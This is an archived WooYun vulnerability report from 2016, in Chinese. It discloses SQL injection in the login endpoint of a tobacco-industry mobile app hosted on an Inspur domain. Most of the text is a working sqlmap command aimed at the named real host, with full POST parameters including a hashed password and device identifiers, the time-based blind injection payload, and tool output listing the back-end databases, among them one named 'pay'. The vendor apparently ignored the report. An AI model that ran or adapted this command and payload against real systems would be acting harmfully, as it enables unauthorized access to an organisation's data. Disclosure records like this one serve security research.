乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-02-17: 细节已通知厂商并且等待厂商处理中 2016-02-22: 厂商已经主动忽略漏洞,细节向公众公开
rt
这个奇葩app烟草e通 登录处 注入
python sqlmap.py -u "http://sjdy.inspur.com/app/servlet/validate" --data "userid=admin&pwd=034232d0d08907880acefc5efc0408eb&mobile=188888888&os=android&version=1.1.2&uim=460031410561419&imageversion=1" --dbs
Parameter: userid (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: userid=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))hNby) AND 'YBMg'='YBMg&pwd=034232d0d08907880acefc5efc0408eb&mobile=188888888&os=android&version=1.1.2&uim=460031410561419&imageversion=1---[12:21:13] [INFO] the back-end DBMS is MySQLweb application technology: JSPback-end DBMS: MySQL 5.0.12[12:21:13] [INFO] fetching database names[12:21:13] [INFO] fetching number of databases[12:21:13] [INFO] resumed: 8[12:21:13] [INFO] resumed: information_schema[12:21:13] [INFO] resumed: ZHSW_APP[12:21:13] [INFO] resumed: ZHSW_PM[12:21:13] [INFO] resumed: mysql[12:21:13] [INFO] resumed: pay[12:21:13] [INFO] resumed: performance_schema[12:21:13] [INFO] resumed: pm[12:21:13] [INFO] resumed: testavailable databases [8]:[*] information_schema[*] mysql[*] pay[*] performance_schema[*] pm[*] test[*] ZHSW_APP[*] ZHSW_PM
域名是浪潮的 就交给浪潮吧
危害等级:无影响厂商忽略
忽略时间:2016-02-22 13:10
漏洞Rank:15 (WooYun评价)
暂无